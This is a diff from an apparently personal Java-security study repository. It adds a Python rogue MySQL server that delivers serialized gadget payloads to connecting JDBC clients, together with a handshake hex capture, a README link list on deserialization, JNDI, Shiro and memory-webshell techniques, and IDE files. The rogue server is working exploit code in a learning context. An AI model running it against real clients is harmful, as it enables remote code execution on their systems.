print("回显SET包") + return "0700000200000002000000" + else: + print("未知请求") + print(pdata) + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + +def process(conn): + global SHOW_VARIABLES + #hello 包 + print("发送hello包") + conn.sendall(bytes.fromhex("4a0000000a352e372e32360018000000374a10207a5f771e00fff7c00200ff81150000000000000000000025551379067c13160d46727b006d7973716c5f6e61746976655f70617373776f726400")) + + # 接收登录包 + conn.recv(10240) + print("接收到登录包") + + # 登录成功包 + conn.sendall(bytes.fromhex("0700000200000002000000")) + print("给客户端响应登录成功") + + while True: + data = conn.recv(10240) + if b'SHOW SESSION STATUS' in data.upper(): + conn.sendall(bytes.fromhex("0100000103")) + conn.sendall(bytes.fromhex("1a000002036465660001610161016101610c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("1a000003036465660001610161016201620c3f001c000000fcffff0000001a000004036465660001610161016301630c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("05000005fe00000200")) + payload_content = get_payload_content() + mysql_data = "" + payload_length = str(hex(len(payload_content) // 2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + data_len = str(hex(len(payload_content) // 2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc' + payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + conn.sendall(bytes.fromhex(mysql_data)) + print("交互完成") + else: + conn.sendall(bytes.fromhex(get_data(data))) + +sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +sk.bind(("0.0.0.0", 3307)) +sk.listen(1) + +while True: + conn, addr = sk.accept() + threading.Thread(target=process, args=(conn,)).start() \ No newline at end of file 
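Review bot: `sk.bind(("0.0.0.0", 3307))` makes this fake MySQL server reachable from every interface on the host, whereas the sibling fakeServer.py in this commit binds `127.0.0.1`; a lab harness that hands serialized gadget bytes to whatever connects should stay on loopback unless it is deliberately exposed for a specific test — `sk.bind(("127.0.0.1", 3307))`. `SHOW_VARIABLES` is declared `global` in both `get_data` and `process` and assigned in `get_data`, but it is never read anywhere, so the flag and both `global` statements can go. `process` never closes `conn`, and the accept loop starts one thread per connection that only ends when the client drops or the process is killed; wrapping the body of `process` in `try:` / `finally: conn.close()` at least releases each socket once the client goes away.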
diff --git a/PyCharm/JDBC/Mysql/hex.pcap b/PyCharm/JDBC/Mysql/hex.pcap new file mode 100644 index 0000000..d04bd06 Binary files /dev/null and b/PyCharm/JDBC/Mysql/hex.pcap differ diff --git a/PyCharm/JDBC/Mysql/hex.txt b/PyCharm/JDBC/Mysql/hex.txt new file mode 100644 index 0000000..7805cfe --- /dev/null +++ b/PyCharm/JDBC/Mysql/hex.txt @@ -0,0 +1,6 @@ +4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400 +ee0000018fa23a01ffffff00210000000000000000000000000000000000000000000000726f6f740014de2610f806e26176c3dec080531f4d0a0666cd1874657374006d7973716c5f6e61746976655f70617373776f7264008b105f72756e74696d655f76657273696f6e09312e382e305f3334310f5f636c69656e745f76657273696f6e06352e312e34370c5f636c69656e745f6e616d65144d7953514c20436f6e6e6563746f72204a6176610f5f636c69656e745f6c6963656e73650347504c0f5f72756e74696d655f76656e646f72124f7261636c6520436f72706f726174696f6e00000000000000000000000000 +0700000200000002000000 +140000000353484f572053455353494f4e20535441545553 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 diff --git a/PyCharm/JDBC/Mysql/hex1.pcap b/PyCharm/JDBC/Mysql/hex1.pcap new file mode 100644 index 0000000..795c3f6 Binary files /dev/null and b/PyCharm/JDBC/Mysql/hex1.pcap differ diff --git a/README.md b/README.md index 4bf4d31..bbdd6df 100644 --- a/README.md +++ b/README.md 
@@ -5,40 +5,24 @@ - [Java基础](#Java基础) - [Java安全基础](#Java安全基础) -- [代码 / jar包调试](#代码 / jar包调试) +- [代码和jar包调试](#代码和jar包调试) +- [查漏补缺](#查漏补缺) - [反序列化](#反序列化) - - CC链 - - hessian - - 其他链子&姿势 - [JNDI](#JNDI) - - 基础内容 - - 高版本JDK绕过 - - 基于BeanFactory - - 其他Factory绕过(主要结合JDBC打) - [JDBC](#JDBC) - [shiro](#shiro) - - - shiro反序列化 - - shiro越权 - [Fastjson&Jackson&SnakeYaml](#Fastjson&Jackson&SnakeYaml) - [内存马&回显技术](#内存马&回显技术) - [高版本jdk下的链子](#高版本jdk下的链子) +- [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) -- [SpringBoot](#SpringBoot) +- [中间件相关](#中间件相关) +- [Spring系列](#Spring系列) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) - - - 若依 - - - WebGoat - - 泛微Ecology9 - - 用友U8Cloud - [代码审计辅助工具](#代码审计辅助工具) - - - jar-analyzer - - tabby - - CodeQL -- [学习路线整合](#学习路线整合) +- [参考学习路线](#参考学习路线) +- [博客&公众号整理](#博客整理) - [工具推荐](#工具推荐) @@ -107,7 +91,25 @@
-# 代码 / jar包调试 +# JavaWeb基础 + +## JavaWeb常见漏洞 + +### XXE + +[XXE整理 | 1diot9's Blog](https://1diot9.github.io/2025/11/18/XXE整理/) 参考的文章记得看 + +[一篇文章带你深入理解漏洞之 XXE 漏洞-先知社区](https://xz.aliyun.com/news/2994) 虽然不针对Java,但是写的很完整 + + + + + + + +
+ +# 代码 / jar包调试 一开始做ctf题的时候,遇到过很尴尬的情况,拿到jar包,不知道要怎么在本地调试。后面才学习到了反编译,远程调试等内容。 @@ -119,8 +121,24 @@
+# 查漏补缺 + +主要记录一些新遇到的小知识。 + +[Java Runtime.getRuntime().exec由表及里-先知社区](https://xz.aliyun.com/news/6642) 剖析了Runtime为什么不能识别特殊符号的本质 + +[shadow-horse/java.lang.Runtime.exec-Payload: 反弹shell,Runtime.exec()执行系统命令](https://github.com/shadow-horse/java.lang.Runtime.exec-Payload) Runtime命令生成 + + + +
+ + + # 反序列化 +一开始可以只看CC链 + ## CC链 CC链是Java反序列化的开始,每个人都应该好好学习。 @@ -131,15 +149,51 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [Java 反序列化漏洞(二) - Commons Collections | 素十八](https://su18.org/post/ysoserial-su18-2/#commonscollections1) su18师傅的反序列化取经路 -=========================快速入门的话,可以只看上面的CC链========================= +=========================快速入门的话,可以只看上面的========================= + +[CC链再次挖掘-先知社区](https://xz.aliyun.com/news/14431) 可以尝试一下自己能不能找到其他类利用 + +[CC链再挖掘 | 1diot9's Blog](https://1diot9.github.io/2025/10/27/CC链再挖掘/) 基于上面的文章,着重于如何审计 + +[java反序列化漏洞commons-collections3.2.1TransformedList触发transform-先知社区](https://xz.aliyun.com/news/13748) + +[老链新看——CommonsCollections链](https://mp.weixin.qq.com/s/zNsTKVumW-wa91Eb63WVZA)
## hessian -[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) +[Hessian反序列化原理到武器化利用 - FreeBuf网络安全行业门户](https://www.freebuf.com/articles/web/424308.html) 简要原理+常规链子 + +[超详细解析Hessian利用链-先知社区](https://xz.aliyun.com/news/13039) 常规链子 + +[漏洞篇 - Hessian 反序列化详解 - 妙尽璇机](https://changeyourway.github.io/2025/02/20/Java 安全/漏洞篇-Hessian反序列化/) 常规链子 + +[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) 原理+Apache Dubbo + +[0CTF/TCTF 2022 hessian-onlyJdk | Bmth's blog](http://www.bmth666.cn/2023/02/07/0CTF-TCTF-2022-hessian-onlyJdk/index.html) only-jdk链 + +[0ctf2022 hessian-only-jdk writeup jdk原生链-先知社区](https://xz.aliyun.com/news/11178) tabby挖掘 + +[Hessian 反序列化新链分析与坑点 | zoiltin's Blog](https://zoiltin.github.io/posts/hessian反序列化新链分析与坑点/) 新链 + +[从2025blackhat-jdd hessian反序列化jdk原生新链开始学习链子构造-先知社区](https://xz.aliyun.com/news/18935) 新链 + +[Hessian反序列化流程及漏洞浅析-先知社区](https://xz.aliyun.com/news/17603) + +[基础篇 - Hessian 协议详解 - 妙尽璇机](https://changeyourway.github.io/2024/11/13/Java 安全/基础篇-Hessian协议详解/) -[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/) +[Hessian 反序列化漏洞 · 攻击Java Web应用-Java Web安全\]](https://www.javasec.org/java-vuls/Hessian.html) + +[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/) + +
+ +## 利用链探测 + +[构造java探测class反序列化gadget | 回忆飘如雪](https://gv7.me/articles/2021/construct-java-detection-class-deserialization-gadget/#0x01-背景) 实战下利用链探测,dns法,反序列化炸弹延时法 + +[Java序列化炸弹解析-CSDN博客](https://blog.csdn.net/nevermorewo/article/details/100100048)
@@ -147,7 +201,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [Java反序列化之C3P0链 | Drunkbaby's Blog](https://drun1baby.top/2022/10/06/Java反序列化之C3P0链/) c3p0,可以打二次反序列化 -[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) +[分析尝试利用tabby挖掘-SpringAOP链 - Potat0w0](https://blog.potatowo.top/2025/03/31/从复现到尝试用tabby挖掘-SpringAOP链/) [realworldctf old system复盘(jdk1.4 getter jndi gadget)-先知社区](https://xz.aliyun.com/news/8630) LdapAttribute链 @@ -171,41 +225,79 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [JNDI · 攻击Java Web应用-Java Web安全](https://www.javasec.org/javase/JNDI/#jndi) 里面引用了一篇命名和目录服务基本概念的文章,记得看,对后面理解RMI和LDAP很有帮助,很多东西都会在调试里遇到 +[Log4j2漏洞分析 | 1diot9's Blog](https://1diot9.github.io/2025/12/08/Log4j2漏洞分析/) + =========================快速入门的话,可以先只看上面部分的========================= -
+## RMI、JRMP、JEP290、LDAP -## 高版本JDK绕过 +这里的目标是: -### 基于BeanFactory +1、搞清楚RMI的通信流程,搞清楚Server,Registry,Client三者互相的打法 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行,还有Snakeyaml,XStream等方式(高版本tomcat的forceString被禁) +2、了解JRMP在RMI中的作用,知道它和DGC的关系 -
+3、了解两次JEP290的防护和绕过,JEP290(8u121~8u230),JEP290(>8u231) -### 其他Factory绕过 +4、了解JNDI的基本打法,包括codebase远程加载,ldap发送反序列化数据,reference本地工厂(BeanFactory为例) -[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样,都可以实现JNDI+JDBC,都是可以执行初始化sql语句 +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 我这篇写的比较完整,但是不会过于全面,可以先看 -[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) +下面整理当时看的部分文章 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC +### 综合梳理 -[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) +[奇安信攻防社区-JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月](https://forum.butian.net/share/2278) 这个感觉最清楚,底下的参考文章也看看 -
+[基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI-先知社区](https://xz.aliyun.com/news/6675) + +[搞懂RMI、JRMP、JNDI-终结篇-先知社区](https://xz.aliyun.com/news/6860) 里面提到的文章也要看 -## 未分类 +### RMI -[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) +[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) -[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) +[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) + +[RMI-攻击方式总结-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/257452#h2-6) 有比较完整的示例代码 [MyJavaSecStudy/docs/Java安全漫谈.pdf at main · 1diot9/MyJavaSecStudy](https://github.com/1diot9/MyJavaSecStudy/blob/main/docs/Java安全漫谈.pdf) 04-06详细讲了RMI的通信过程 +### JRMP&JEP290 + +[JRMP通信攻击过程及利用介绍-先知社区](https://xz.aliyun.com/news/15240) + +[RMI-JEP290的分析与绕过-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/259059#h2-0) + +[Shiro有key但无回显利用链子-JRMP大法_shiro有key无链怎么办?-CSDN博客](https://blog.csdn.net/weixin_43264067/article/details/139626398) 可以通过jrmp进行利用链探测 + +
+ +## 高版本JDK绕过 + +### 基于反序列化 + +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 5.1.1和5.2.2有讲 + +### 基于BeanFactory + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行,还有Snakeyaml,XStream等方式(高版本tomcat的forceString被禁) + +
+ +### 其他Factory绕过 + [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103) com.sun.jndi.ldap.object.trustSerialData false的绕过 -[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857) +[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样,都可以实现JNDI+JDBC,都是可以执行初始化sql语句 + +[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC + +[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) + +[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857)
@@ -215,6 +307,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [MySQL jdbc 反序列化分析 | Drunkbaby's Blog](https://drun1baby.top/2023/01/13/MySQL-jdbc-反序列化分析/) 最经典的mysql-jdbc +[mysql JDBC 攻击 | 1diot9's Blog](https://1diot9.github.io/2025/05/05/mysql-JDBC-绕过/) 整理了打法和绕过 + ============如果真的很急,JDBC可以先只看上面这一个mysql,其他的遇到了再学================= [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) 这个打法比较新,其中的临时文件上传适用性广 @@ -283,11 +377,23 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 ====================shiro反序列化快速入门的话,可以只看上面的====================== +[全版本Shiro反序列化漏洞原理详解 - Smile3306 - 博客园](https://www.cnblogs.com/Smile3306/p/18984943) 详细梳理了加密和利用原理 + +[CBC字节翻转攻击&Padding Oracle Attack原理解析 - 枫のBlog](https://goodapple.top/archives/217) 721构造合法密文的具体原理 + [Shiro RememberMe 漏洞检测的探索之路 - CT Stack 安全社区](https://stack.chaitin.com/techblog/detail/39) 通过密钥正常错误时,回显中rememberMe字段的不同来实现密钥爆破 -[一种另类的 shiro 检测方式](https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ) +[奇安信攻防社区-一种另类的shiro检测方式](https://forum.butian.net/share/92) + +payload缩短这部分内容挺多的,感觉能单独研究了。 + +[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面提到的文章都要看 + +[浅谈Shiro550受Tomcat Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/浅谈Shiro550受Tomcat-Header长度限制影响突破/) 这里提供了其他缩短的方法 + +[终极Java反序列化Payload缩小技术](https://mp.weixin.qq.com/s/cQCYhBkR95vIVBicA9RR6g) + -[Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面还提到pen4uin师傅的文章,也可以去看看
@@ -353,14 +459,16 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 =====================快速入门的话,可以先只看上面的几篇文章====================== -[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马,记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) +[bitterzzZZ/MemoryShellLearn: 分享几个直接可用的内存马,记录一下学习过程中看过的文章](https://github.com/bitterzzZZ/MemoryShellLearn) -[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) +[Getshell/Mshell: Memshell-攻防内存马研究](https://github.com/Getshell/Mshell) -[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马,公众号:追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) +[W01fh4cker/LearnJavaMemshellFromZero: 【三万字原创】完全零基础从0到1掌握Java内存马,公众号:追梦信安](https://github.com/W01fh4cker/LearnJavaMemshellFromZero) 上面这三篇都是内存马学习的相关项目,里面有很多优秀的文章和案例代码 +[浅谈 Java Agent 内存马 – 天下大木头](https://wjlshare.com/archives/1582) + [奇安信攻防社区-Solon框架注入内存马](https://forum.butian.net/share/3700) 里面提到的Java Object Searcher值得学习 [c0ny1/java-object-searcher: java内存对象搜索辅助工具](https://github.com/c0ny1/java-object-searcher) @@ -373,6 +481,10 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+### 其他内存马 + +[Lilctf_blade_cc](https://www.n1ght.cn/2025/08/21/blade_cc/#blade内存马) blade内存马 + ### 内存马工具 [pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具|A customizable Java in-memory webshell generation tool.](https://github.com/pen4uin/java-memshell-generator) @@ -385,6 +497,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [pen4uin/java-echo-generator: 一款支持自定义的 Java 回显载荷生成工具|A customizable Java echo payload generation tool.](https://github.com/pen4uin/java-echo-generator) 回显技术的工具 +[java_linux通用回显马](https://www.n1ght.cn/2025/08/21/java_linux通用回显马/) +
@@ -405,6 +519,34 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 +
+ +# 表达式+SSTI + +## SPEL + +[SpEL表达式注入漏洞学习和回显poc研究 - bitterz - 博客园](https://www.cnblogs.com/bitterz/p/15206255.html#语法基础) 写的比较简洁,可以按里面搭Web环境 + +[SpEL注入RCE分析与绕过-先知社区](https://xz.aliyun.com/news/8744) payload比较完整 + +[Java 之 SpEL 表达式注入 | Drunkbaby's Blog](https://drun1baby.top/2022/09/23/Java-之-SpEL-表达式注入/) 写的很详细,包括SPEL用法 + +
+ +## EL + + + +
+ +## Thymeleaf + +[Java Thymeleaf SSTI(本质为SpEL) | Godown_blog](https://godownio.github.io/2025/04/28/java-thymeleaf-ssti-spel/) + + + + +
# RASP @@ -413,31 +555,61 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-# SpringBoot +# 中间件相关 + +## Tomcat + +[Tomcat URL解析差异性导致的安全问题-先知社区](https://xz.aliyun.com/news/7139) + +## Resin + +[URL解析导致的鉴权绕过问题探究-Resin篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-resin/) + +# Spring系列 + +## SpringBoot [LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) 总结了SpringBoot的常见利用方式
-## heapdump分析 +### 源码分析 + +[DispatcherServlet.doDispatch请求分发详解 | Godown_blog](https://godownio.github.io/2025/03/25/spring-dispatcherservlet-xiang-jie/) + +
+ +### URL解析差异 + +[URL解析导致的鉴权绕过问题探究-SpringSecurity篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-SpringSecurity/) + +[7. JEECG-灰盒Fuzzing](https://www.yuque.com/pmiaowu/gpy1q8/gl653fmytz1hoyev) + +
+ +### heapdump分析 主要是jdk自带的VisualVM看jdk版本,heapdump_tools分析依赖和密码 +[heapdump深度利用之信息泄露篇](https://mp.weixin.qq.com/s/VBCjtLxcdFvIJ0uK-sCdDw) + [Springboot信息泄露以及heapdump的利用_heapdump信息泄露-CSDN博客](https://blog.csdn.net/weixin_44309905/article/details/127279561) [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103?time__1311=eqUxuiDt5WqYqY5DsD7mPD%3DIZK7q9hGBbD&u_atoken=b94f9c93564049e1d2601ebb22a1098b&u_asig=0a472f9217433333617862864e004b)
-## 文件缓存机制 +### 文件缓存机制 [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) - -
+## Spring Cloud +[Spring Cloud GateWay CVE-2025-41243 分析-先知社区](https://xz.aliyun.com/news/19006) + +[CVE-2025-41243 Spring Cloud Gateway SpEL 沙箱从任意属性访问到任意文件下载 - 白帽酱の博客](https://rce.moe/2025/09/29/CVE-2025-41243/) # 工具开发/二开 @@ -449,13 +621,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 -# JavaWeb基础 - -待完善。。。 - - -
# 代码审计 @@ -505,14 +671,24 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [用友U8Cloud环境搭建 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/U8Cloud环境搭建/) +[用友U8Cloud最新前台RCE漏洞挖掘过程分享](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) + [用友U8cloud-esnserver接口RCE | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-esnserver接口RCE/) [用友U8cloud-ServiceDispacherServlet反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-ServiceDispacherServlet反序列化/) -[微信公众平台](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) - [用友U8cloud-LoginVideoServlet接口反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-LoginVideoServlet接口反序列化/) +## 契约锁 + +[契约锁电子签章系统 pdfverifier rce 前台漏洞分析(从源码分析)-先知社区](https://xz.aliyun.com/news/18520) + +[契约锁pdfverifier RCE攻防绕过史](https://mp.weixin.qq.com/s/u--mcFjhYly74q-Qg3D7jQ) + +[契约锁电子签章系统 pdfverifier 远程代码执行漏洞分析(补丁包逆向分析)-先知社区](https://xz.aliyun.com/news/18482) + +[契约锁代码审计分析_契约锁漏洞-CSDN博客](https://blog.csdn.net/baidu_25299117/article/details/139990814) +
# 代码审计辅助工具 @@ -541,6 +717,16 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [1. 案例-CodeQL自动化挖掘JavaSecCode](https://www.yuque.com/pmiaowu/gpy1q8/upavb10n5vnit3y3) +[使用CodeQL_n1ght进行漏洞审计思路-先知社区](https://xz.aliyun.com/news/18769) 实战审计例子,有空看看 + +[codeql带依赖jar包数据库生成](https://www.n1ght.cn/2025/06/16/codeql带依赖jar包数据库生成/) + +[CodeQL踩坑日记and规则分享](https://mp.weixin.qq.com/s/cOXc0MyDXhslTPBENfd4Pg) + +[CodeQL分析java反序列化gadget第一期--CC1链-先知社区](https://xz.aliyun.com/news/18578) + +[聊一聊 CodeQL 基础之过河问题](https://mp.weixin.qq.com/s/CCwWUrRa0K_hcBYEaAe8xQ) + [利用Github Actions生成CodeQL数据库 -- 以AliyunCTF2024 Chain17的反序列化链挖掘为例 - KingBridge - 博客园](https://www.cnblogs.com/kingbridge/articles/18100619) [aliyun ctf chain17 回顾(超详细解读)-先知社区](https://xz.aliyun.com/news/16179) @@ -565,7 +751,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 -# 学习路线整合 +# 参考学习路线 这里是其他师傅整理的学习路线,我这里仅列举了我看过的一些,如果有其他推荐的,可以私聊我 @@ -585,6 +771,38 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+# 博客&公众号整理 + +整理一些我经常看的博客和公众号。由于个人见识有些,可能有很多其他优秀的博客和公众号没收录 + +## 博客 + +[Archives | Bmth's blog](http://www.bmth666.cn/archives/) + +[Y4tacker:Hacking The World!](https://y4tacker.github.io/) + +[All Posts - X1r0z Blog](https://exp10it.io/posts/) + +[Jasper_sec](https://jaspersec.top/) + +[真爱和自由 的个人主页-先知社区](https://xz.aliyun.com/users/141946/news) + +[Archives - Boogiepop Doesn't Laugh](https://boogipop.com/archives/) + +
+ +## 公众号 + +漫漫安全路 + +珂技知识分享 里面还有pwn入门文章 + +菜狗安全 + +Heihu Share + +
+ # 工具推荐 [vulhub/java-chains: Vulhub Vulnerability Reproduction Designated Platform](https://github.com/vulhub/java-chains) 利用链神器 diff --git a/hessian/.gitignore b/hessian/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/hessian/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/hessian/.idea/.gitignore b/hessian/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/hessian/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/hessian/.idea/encodings.xml b/hessian/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/hessian/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/misc.xml b/hessian/.idea/misc.xml new file mode 100644 index 0000000..8345e46 --- /dev/null +++ b/hessian/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/uiDesigner.xml b/hessian/.idea/uiDesigner.xml new file mode 100644 index 0000000..2b63946 --- /dev/null +++ b/hessian/.idea/uiDesigner.xml 
@@ -0,0 +1,124 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/vcs.xml b/hessian/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/hessian/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/hessian/Hessian.bin b/hessian/Hessian.bin new file mode 100644 index 0000000..70bb29e Binary files /dev/null and b/hessian/Hessian.bin differ diff --git a/hessian/HessianStudy/.idea/codeStyles/Project.xml b/hessian/HessianStudy/.idea/codeStyles/Project.xml deleted file mode 100644 index 919ce1f..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/Project.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml b/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml deleted file mode 100644 index a55e7a1..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml +++ /dev/null @@ -1,5 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/ser.bin b/hessian/HessianStudy/ser.bin deleted file mode 100644 index 22f2dce..0000000 --- a/hessian/HessianStudy/ser.bin +++ /dev/null @@ -1 +0,0 @@ -Ccom.hessian.pojo.Personnameagemap`1diOt9HnamemaxyyyZ \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java b/hessian/HessianStudy/src/main/java/com/hessian/Tools.java deleted file mode 100644 index 5dc74d5..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java +++ /dev/null 
@@ -1,78 +0,0 @@ -package com.hessian; - -import com.sun.org.apache.xalan.internal.xsltc.compiler.Template; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; - -import java.io.IOException; -import java.lang.reflect.Array; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.nio.file.Files; -import java.nio.file.Paths; -import java.util.HashMap; - -public class Tools { - public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - break; - } catch (NoSuchFieldException e) { - aClass = 